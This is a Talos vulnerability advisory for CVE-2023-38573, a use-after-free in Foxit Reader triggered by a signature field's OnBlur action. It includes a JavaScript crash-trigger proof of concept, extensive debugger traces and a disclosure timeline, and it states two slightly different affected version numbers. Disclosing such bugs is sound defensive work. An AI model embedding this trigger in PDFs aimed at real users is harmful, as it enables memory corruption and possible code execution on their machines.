Talos Vulnerability Report

TALOS-2023-1839

Foxit Reader signature field OnBlur event use-after-free vulnerability

November 27, 2023
CVE Number

CVE-2023-38573

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader 12.1.2.15356 handles a signature field. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.3.15356

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a signature object. This can be illustrated by the following proof-of-concept code:

function main() {

    getField('Signature_0').setAction("OnBlur",'dp();'); 
    getField('Signature_0').setFocus();	
    app.activeDocs[0].getField('Text Field0').setFocus();

}


function dp() {

    app.activeDocs[0].deletePages();  
    app.activeDocs[0].deletePages();

}

The above code simply assigns a callback function to the OnBlur action for the field Signature_0, which is promptly triggered by a call to setFocus on the field. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when a signature object is freed by deletePages() and is used without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
Breakpoint 0 hit
eax=073fefb0 ebx=073ff01c ecx=0289e7c0 edx=00000002 esi=0ea58f40 edi=0c212748
eip=02bc2d39 esp=073fef88 ebp=073fefc8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf11060 (0289e7c0)}
0:000> g
Breakpoint 0 hit
eax=073fefa8 ebx=073ff014 ecx=028fec20 edx=00000002 esi=0e94adc8 edi=0e4def80
eip=02bc2d39 esp=073fef80 ebp=073fefc0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf714c0 (028fec20)}
0:000> g
Breakpoint 0 hit
eax=073fefb0 ebx=073ff01c ecx=0289e7c0 edx=00000002 esi=0c112108 edi=0c1632b0
eip=02bc2d39 esp=073fef88 ebp=073fefc8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf11060 (0289e7c0)}
0:000> g
Breakpoint 0 hit
eax=073fefb0 ebx=073ff01c ecx=028feee0 edx=00000002 esi=0c24a958 edi=0c2c96d8
eip=02bc2d39 esp=073fef88 ebp=073fefc8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf71780 (028feee0)}
0:000> g
Breakpoint 0 hit
eax=073fefb0 ebx=073ff01c ecx=0289e7c0 edx=00000002 esi=0c2aff10 edi=0feb0dd0
eip=02bc2d39 esp=073fef88 ebp=073fefc8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf11060 (0289e7c0)}
0:000> g
Breakpoint 0 hit
eax=073fefb0 ebx=073ff01c ecx=028feee0 edx=00000002 esi=0e72ef60 edi=0c0e3dd0
eip=02bc2d39 esp=073fef88 ebp=073fefc8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf71780 (028feee0)}
0:000> g
Breakpoint 0 hit
eax=073fea10 ebx=073fea7c ecx=0289c6c0 edx=00000002 esi=0c405408 edi=0ea4ccd0
eip=02bc2d39 esp=073fe9e8 ebp=073fea28 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf0ef60 (0289c6c0)} ; <-----------------[1]

0:000> g
Breakpoint 0 hit
eax=073fea10 ebx=073fea7c ecx=0289c6c0 edx=00000002 esi=08857530 edi=0ea8a9c8
eip=02bc2d39 esp=073fe9e8 ebp=073fea28 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf0ef60 (0289c6c0)}
0:000> g
Breakpoint 1 hit
eax=073fe854 ebx=0c083100 ecx=0c083100 edx=00000001 esi=0b0e2748 edi=0c083100
eip=00802563 esp=073fe838 ebp=073fe860 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3d823:
00802563 c745fc0c000000  mov     dword ptr [ebp-4],0Ch ss:0023:073fe85c=ffffffff
0:000> g
Breakpoint 1 hit
eax=00000001 ebx=00000014 ecx=18ab8188 edx=00000001 esi=1067cf08 edi=0c083100
eip=008027a9 esp=073fe838 ebp=073fe860 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3da69:
008027a9 c745fcffffffff  mov     dword ptr [ebp-4],0FFFFFFFFh ss:0023:073fe85c=ffffffff
0:000> pc
eax=00000000 ebx=00000014 ecx=0c2dac18 edx=00000001 esi=1067cf08 edi=0c083100
eip=008027c3 esp=073fe830 ebp=073fe860 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3da83:
008027c3 e86a389f03      call    FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4702 (041f6032)
0:000> pt
eax=00000001 ebx=0c083100 ecx=1f281c24 edx=00000001 esi=0b0e2748 edi=0ea98c10
eip=008027dc esp=073fe864 ebp=073fe888 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3da9c:
008027dc c3              ret
0:000> p
eax=00000001 ebx=0c083100 ecx=1f281c24 edx=00000001 esi=0b0e2748 edi=0ea98c10
eip=007e2dfd esp=073fe868 ebp=073fe888 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1e0bd:
007e2dfd 689c000000      push    9Ch
0:000> p
eax=00000001 ebx=0c083100 ecx=1f281c24 edx=00000001 esi=0b0e2748 edi=0ea98c10
eip=007e2e02 esp=073fe864 ebp=073fe888 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1e0c2:
007e2e02 53              push    ebx                                                ;< --------------------------------------[2]
0:000> p
eax=00000001 ebx=0c083100 ecx=1f281c24 edx=00000001 esi=0b0e2748 edi=0ea98c10
eip=007e2e03 esp=073fe860 ebp=073fe888 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1e0c3:
007e2e03 e82a32a103      call    FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4702 (041f6032);< -------------[3]
0:000> dd ebx                                                                ;< --------------------------------------[4]
0c083100  055d9c84 0c2dac18 0552f10c 18ab8188
0c083110  00000000 00000001 00000000 0c33b278
0c083120  00000000 00000000 00000000 00000000
0c083130  00000000 00000000 00000000 00000000
0c083140  0ae31290 00000000 00000000 e0e0e000
0c083150  00000000 00000000 00000000 00000000
0c083160  00000000 e0e0e000 00000000 00000000
0c083170  00000000 00000000 00000000 00000010

0:000> p
eax=00000001 ebx=0c083100 ecx=0c083100 edx=00000001 esi=0b0e2748 edi=0ea98c10
eip=007e2e08 esp=073fe860 ebp=073fe888 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1e0c8:
007e2e08 83c408          add     esp,8
0:000> dd 0c083100                                                                    ;< --------------------------------------[5]
0c083100  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0c083110  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0c083120  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0c083130  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0c083140  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0c083150  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0c083160  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0c083170  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0:000> p
eax=00000001 ebx=0c083100 ecx=0c083100 edx=00000001 esi=0b0e2748 edi=0ea98c10
eip=007e2e0b esp=073fe868 ebp=073fe888 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1e0cb:
007e2e0b 6a18            push    18h

At [1] above, the method associated with deletePages() is called. This method calls a free function at [3] and the argument of the function comes from the ebx register at [2]. The value of the vulnerable buffer is examined at [4], and [5] shows the value before and after the free function is called. The vulnerable buffer is a signature object, which is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> p
eax=00000001 ebx=0c083101 ecx=073ff45c edx=0ff95368 esi=0c0d3418 edi=0e7641d8
eip=01947901 esp=073ff430 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104b1:
01947901 e84a1e5700      call    FoxitPDFReader!safe_vsnprintf+0x52bff0 (01eb9750)
0:000> p
eax=00000000 ebx=0c083101 ecx=07500000 edx=07500000 esi=0c0d3418 edi=0e7641d8
eip=01947906 esp=073ff430 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104b6:
01947906 8ac3            mov     al,bl
0:000> p
eax=00000001 ebx=0c083101 ecx=07500000 edx=07500000 esi=0c0d3418 edi=0e7641d8
eip=01947908 esp=073ff430 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104b8:
01947908 8b4df4          mov     ecx,dword ptr [ebp-0Ch] ss:0023:073ff448=073ff498
0:000> p
eax=00000001 ebx=0c083101 ecx=073ff498 edx=07500000 esi=0c0d3418 edi=0e7641d8
eip=0194790b esp=073ff430 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104bb:
0194790b 64890d00000000  mov     dword ptr fs:[0],ecx fs:003b:00000000=073ff448
0:000> p
eax=00000001 ebx=0c083101 ecx=073ff498 edx=07500000 esi=0c0d3418 edi=0e7641d8
eip=01947912 esp=073ff430 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104c2:
01947912 59              pop     ecx
0:000> p
eax=00000001 ebx=0c083101 ecx=1f280010 edx=07500000 esi=0c0d3418 edi=0e7641d8
eip=01947913 esp=073ff434 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104c3:
01947913 5f              pop     edi
0:000> p
eax=00000001 ebx=0c083101 ecx=1f280010 edx=07500000 esi=0c0d3418 edi=0c0d3418
eip=01947914 esp=073ff438 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104c4:
01947914 5e              pop     esi
0:000> p
eax=00000001 ebx=0c083101 ecx=1f280010 edx=07500000 esi=0e7641d8 edi=0c0d3418
eip=01947915 esp=073ff43c ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104c5:
01947915 5b              pop     ebx
0:000> p
eax=00000001 ebx=0c083100 ecx=1f280010 edx=07500000 esi=0e7641d8 edi=0c0d3418
eip=01947916 esp=073ff440 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104c6:
01947916 8be5            mov     esp,ebp
0:000> p
eax=00000001 ebx=0c083100 ecx=1f280010 edx=07500000 esi=0e7641d8 edi=0c0d3418
eip=01947918 esp=073ff454 ebp=073ff454 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104c8:
01947918 5d              pop     ebp
0:000> p
eax=00000001 ebx=0c083100 ecx=1f280010 edx=07500000 esi=0e7641d8 edi=0c0d3418
eip=01947919 esp=073ff458 ebp=073ff4a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104c9:
01947919 c20400          ret     4
0:000> p
eax=00000001 ebx=0c083100 ecx=1f280010 edx=07500000 esi=0e7641d8 edi=0c0d3418
eip=00e00af8 esp=073ff460 ebp=073ff4a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e6258:
00e00af8 84c0            test    al,al
0:000> p
eax=00000001 ebx=0c083100 ecx=1f280010 edx=07500000 esi=0e7641d8 edi=0c0d3418
eip=00e00afa esp=073ff460 ebp=073ff4a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e625a:
00e00afa 0f84fa010000    je      FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e645a (00e00cfa) [br=0]
0:000> p
eax=00000001 ebx=0c083100 ecx=1f280010 edx=07500000 esi=0e7641d8 edi=0c0d3418
eip=00e00b00 esp=073ff460 ebp=073ff4a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e6260:
00e00b00 8b13            mov     edx,dword ptr [ebx]  ds:0023:0c083100=f0f0f0f0  <------------------ [6]
0:000> p
eax=00000001 ebx=0c083100 ecx=1f280010 edx=f0f0f0f0 esi=0e7641d8 edi=0c0d3418
eip=00e00b02 esp=073ff460 ebp=073ff4a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e6262:
00e00b02 8bcb            mov     ecx,ebx
0:000> p
eax=00000001 ebx=0c083100 ecx=0c083100 edx=f0f0f0f0 esi=0e7641d8 edi=0c0d3418
eip=00e00b04 esp=073ff460 ebp=073ff4a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e6264:
00e00b04 ff12            call    dword ptr [edx]      ds:0023:f0f0f0f0=???????? <----------------- [7]
0:000> p
(7c0.1c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0c083100 ecx=0c083100 edx=f0f0f0f0 esi=0e7641d8 edi=0c0d3418
eip=00e00b04 esp=073ff460 ebp=073ff4a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e6264:
00e00b04 ff12            call    dword ptr [edx]      ds:0023:f0f0f0f0=????????
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 073ff4a4 007ccc85     0e7641d8 1f28009c 189d323c FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e6264
01 073ff4d8 007cca14     00000000 1f280178 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7f45
02 073ff53c 009651d1     0e80ccb0 0ae34ce0 009651a0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7cd4
03 073ff550 040127a8     0e81da98 00000000 1f280264 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x626c1
04 073ff620 04013983     00000427 0e81da98 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d0e78
05 073ff644 0400e327     00000427 0e81da98 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d2053
06 073ff6b8 0400eb9a     0eb1d1e8 001604f2 00000427 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cc9f7
07 073ff6d8 77033cb7     001604f2 00000427 0e81da98 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cd26a
08 073ff704 770140dc     0400eb66 001604f2 00000427 USER32!_InternalCallWinProc+0x2b
09 073ff7ec 77013bd3     001604f2 00000427 0e81da98 USER32!UserCallWinProcCheckWow+0x26c
0a 073ff85c 770139f0     00000327 073ff884 008ed3c4 USER32!DispatchMessageWorker+0x1d3
0b 073ff868 008ed3c4     088927a0 088927a0 05e73738 USER32!DispatchMessageW+0x10
0c 073ff884 008ed483     05e73738 008ed3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
0d 073ff8a4 0443021e     00000000 05e9fab4 074ff000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
0e 073ff8bc 041f5f48     004d0000 00000000 08831f0c FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5ee8ee
0f 073ff908 76c2d109     074ff000 76c2d0f0 073ff974 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4618
10 073ff918 778f24ed     074ff000 9887f4a8 00000000 KERNEL32!BaseThreadInitThunk+0x19
11 073ff974 778f24c1     ffffffff 77975e66 00000000 ntdll!__RtlUserThreadStart+0x2b
12 073ff984 00000000     041f6017 074ff000 00000000 ntdll!_RtlUserThreadStart+0x1b

At [6] above, we can observe ebx contains the same memory pointer, which belongs to a freed allocation. The value in ebx is dereferenced as if it were an object pointer. This directly leads to a use-after-free condition and results in a crash. Subsequent instructions constitute the usual vtable function call, with the actual function pointer coming from an area pointed to by ebx. This would give an attacker direct control over execution control flow.

Since additional Javascript code can be executed between object free and reuse, freed memory could be put under attacker control. With careful memory layout manipulation, this can lead to further memory corruption and ultimately arbitrary code execution.

TIMELINE

2023-09-18 - Vendor Disclosure
2023-11-22 - Vendor Patch Release
2023-11-27 - Public Release

Credit

Discovered by Aleksandar Nikolic and KPC of Cisco Talos.